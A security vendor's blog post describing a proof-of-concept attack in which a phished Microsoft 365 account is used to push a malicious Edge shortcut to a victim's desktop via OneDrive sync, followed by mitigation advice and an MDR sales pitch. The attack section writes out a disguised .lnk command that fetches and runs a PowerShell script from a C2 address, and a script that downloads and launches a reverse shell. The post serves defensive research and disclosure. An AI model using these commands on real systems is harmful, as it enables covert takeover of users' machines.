The trusted status of Microsoft cloud applications has inevitably resulted in their widespread use in cyber threat campaigns. Over the past few years, the Eye Security research team has tracked multiple threats using Microsoft applications across the attack lifecycle, from initial incursion by phishing for credentials to data exfiltration.
Recent advances like machine learning and computer vision technologies have increased the effectiveness of email security. Therefore, threat actors are exploiting new vectors to phish users for their Microsoft credentials.
These credentials are often used to launch business email compromise (BEC) attacks. But they can also be used to access cloud storage, like OneDrive. This provides many opportunities for a threat actor, including:
- Direct access to valuable information
- A trusted repository to host malware for distribution
- A trusted command and control (C2) channel
- Data exfiltration via a trusted channel
- Synchronisation misuse
It is this final tactic, sync misuse, that our threat researchers decided to investigate further. And we discovered an interesting new potential attack that we have not seen reported in the wild. By combining sync misuse with another known tactic, replacing .lnk files, a threat actor can rapidly move from compromised account to compromised windows host, from where they can move laterally to achieve their goals.
Below we describe this proof-of-concept attack and how you can protect against it.
Recently, we detected a particularly insidious attack using Microsoft Teams to distribute malware. Learn more about this attack and how to protect against it here: "Microsoft Teams Chat: the rising phishing threat and how to stop it".
What is OneDrive sync and how does it work
By default, when you enrol a device in Intune and have no OneDrive/SharePoint policies setup, OneDrive will automatically synchronise a user’s desktop to a OneDrive folder. This also happens when a user signs into OneDrive with their work or school account.
In figure 1 below, you can see a white circle with a green checkmark next to the icon links to the applications and files. This means they are synchronised between the user’s desktop and OneDrive cloud. It's also worth noting that the OneDrive sync through the web interface takes priority over the synchronisation. This means that if a user is working with multiple devices and uploads a file to the web version of OneDrive with the same name, that file will be uploaded and replaced on every other device. A user can choose whether they want to replace the file or to save it as a different name. You can find information about the icons Microsoft assigns on the Microsoft support site.
Proof-of-concept stages
For our proof of concept, we will assume that the target user has already been phished and the threat actor has access to their Microsoft 365 account. The goal is to compromise the target user’s Windows host and encrypt their data by using OneDrive sync to replace a shortcut file on the user's desktop with a malicious one.
Let’s explore how a threat actor might go about this. We’ll start with the target user’s OneDrive page to see what information we can find.
From the default homepage, we can visit the “My Files” section on the left-hand side of the screen, where we see all the folders and files being synced on their OneDrive. We could exfiltrate and steal all the data on OneDrive, but our goal is to compromise the host and run malware or ransomware directly on it. Let's look into the “Desktop” folder.
Our target user has a few shortcut files we can replace. We choose “Microsoft Edge.lnk” since it is likely they will open this browser when they start their workday.
Creating the new shortcut file
In order to create a shortcut file, we will use a tool called “mklnk”. We run the following command to create a malicious link:
┌──(venv)─(kali㉿VM-KALI)-[~/Documents/mklnk]
└─$ python2 lnk.py "Microsoft Edge.lnk" "C:\Windows\System32\cmd.exe" -w "C:\Windows\Temp" -i "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -a "/k \"(C:\PROGRA~2\Microsoft\Edge\Application\msedge.exe & powershell -command \"Write-Output 'Microsoft Edge is updating...'; IEX (iwr -UseBasicParsing 'http://192.168.139.133:1337/rollout.ps1')\")\""
Here is a tear-down of the command:
|
Arguments |
Explanation |
|
Microsoft Edge.lnk |
Name of the shortcut file we are creating. |
|
C:\Windows\System32\cmd.exe |
Program that is being called in the background. |
|
-w "C:\Windows\Temp" |
The working directory. We want to work in Windows/Temp since this directory usually has read/write rights. |
|
-i "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" |
The icon that will be used. |
|
-a "/k \"(C:\PROGRA~2\Microsoft\Edge\Application\msedge.exe & powershell -command\"Write-Output 'Microsoft Edge is updating...'; IEX (iwr –UseBasicParsing 'http://192.168.139.133:1337/rollout.ps1')\")\"" |
The malicious arguments we are giving the shortcut file. Where 192.168.139.133 is our demo C2 server. |
Note that we can change all of these arguments. If the user is using Chrome for example, all we have to do is change the path and name to the Chrome executable.
When the file runs, the following will occur:
- We call the original Edge executable so that the target user will not suspect anything. To them it will look like an Edge browser is opening.
- We call PowerShell and display on the screen that Edge is updating. We do this to engage our target user so they suspect nothing is wrong.
- We invoke and download a PowerShell file which contains our reverse shell. This will give us control of the target’s host.
Preparing the attack
Before replacing the Edge browser .lnk file we prepare the rest of our attack. First, we establish a basic HTTP server, upload the shell and initiate a Netcat listener that will wait for our target user to click the replaced Edge shortcut. We create a script that will grant us access to the target user’s host when they click on the shortcut. The script will download and execute our reverse shell, which we compiled with a project called Sn1r/Nim-Reverse-Shell.
Powershell file (rollout.ps1):
$url = "http://192.168.139.133:1337/allspark.exe"
$outpath = "$env:TEMP/allspark.exe"
Invoke-WebRequest -Uri $url -OutFile $outpath
Start-Process -Filepath "$env:TEMP/allspark.exe"
Now that everything is ready, we can set up the Netcat listener together with the simple HTTP server, ready to download the script when the target user clicks the new Edge browser .lnk file. 
Finally, we upload the malicious .lnk file and let OneDrive sync it to the user’s desktop.
When prompted, we tell OneDrive to replace it.
Executing the attack
Now we wait for the target user to click on the Edge shortcut.
The user clicks and our script runs, giving us access to their Windows host.
Although there are a few signs that something unusual has occurred, it is highly unlikely that our target user will know their host has been compromised. At the bottom of the screen, on the taskbar, you can see two Edge icons. One of them is our disguised cmd.exe, which, if the user clicked, would show them the command line window. Of course, this doesn’t give them a lot of information, as it simply says Edge is updating.
If we open Task Manager, we can see our backdoor process. Since we used known malware, Microsoft Defender detected it as it had a signature for it. A sophisticated threat actor could create a more advanced attack that would not be detected by standard AV.
How to protect against this attack
There are a number of measures you can take to better protect against this type of attack. Below are the most effective.
Change the OneDrive policy to block shortcut files from syncing
You can prevent shortcut files being synced from a user’s desktop to OneDrive by changing the policy in the SharePoint Admin center. Go to settings -> OneDrive Sync -> Block upload of specific file types -> Check the box. This will prevent users from syncing their shortcut files with OneDrive. Do keep in mind this does not prevent uploading shortcut files from the web interface, so we also recommend that files can only be synced from domain joined devices.
This policy only prevents sync from the host to OneDrive, not the other way around. A threat actor can still upload a shortcut file to a users’ desktop folder synchronised on OneDrive, and it will sync to the host, appearing in the first empty spot on their Desktop. This still represents a risk as, in our proof of concept, the target user might not notice a duplicate icon and click the new malicious one.
Figure 14. Changing the OneDrive policy
Unless Microsoft implements a way to also prevent shortcut files being uploaded through the web interface, there is nothing else that can be done to prevent this.
Launch regular user awareness & phishing simulations
It is crucial for organisations to create a culture of security awareness. Train users how to recognise unusual behaviour on their computers and ensure they know how to notify their security or IT department when strange things appear or there is unusual activity.
In our scenario, the user has been phished. It is important to perform regular simulated phishing attacks to train users to recognise the signs of phishing.
Deploy endpoint detection and response (EDR)
As discussed, an attacker that has gone to the trouble of creating this attack, would be unlikely to use a piece of commodity malware that is easy to detect. Therefore, it is important for organisations to have a well-configured EDR solution, such as the market-leading CrowdStrike Falcon or Defender for Endpoint (P2/Business). Even for a sophisticated attack, the threat actor’s actions will result in behaviours that trigger alerts.
Investigate all alerts
When an EDR generates an alert, it is important for an expert security operations (SecOps) analyst to investigate it. In our proof of concept, the EDR blocked malicious actions. However, follow-up is also necessary to investigate what happened, how it occurred, how to prevent it and how to remove any remnants of the action/infection. If no one investigated, the Microsoft 365 account compromise would not have been discovered. It is not unusual for threats to remain undiscovered for weeks, during which time a threat actor can continue to progress an attack.
Make sure your SIEM system is well configured
A Security Information and Event Management (SIEM) system is a crucial component of any organisation's cybersecurity strategy. It centralises security data from multiple sources, including endpoints, servers, cloud and applications, to monitor IT infrastructure, detect anomalies in real-time and maintain detailed logs of all events.
A good SIEM can help detect both known and unknown threats, providing fine-grained, real-time visibility into on-premises and cloud-based activities. It uses correlation rules and statistical algorithms to extract actionable information from events and log entries.
There are various SIEMs that already have built-in rules like LogScale, Microsoft Sentinel and Splunk.
License a managed detection and response service (MDR)
Deploying tools like a SIEM is essential to help reduce the likelihood of an attacker who has successfully compromised a Microsoft account from progressing their attack. However, you still require SecOps experts to make best use of these tools. Many organisations are finding that building a security operations centre (SOC), staffing it, and licensing the tools required is cost-prohibitive. So they turn to third-party managed security services or MDR providers.
MDR services provide organisations of all sizes, across any industry, with a remote SOC staffed by highly skilled SecOps professionals on a 24/7 basis. Their main goal is to monitor specific products in their customers’ infrastructures and detect, respond to, and contain an in-progress cyber attack that has evaded their primary defences.
Get in touch to find out more about Eye Security's MDR and how we differ from other providers by bundling significant value-add across your security programme.
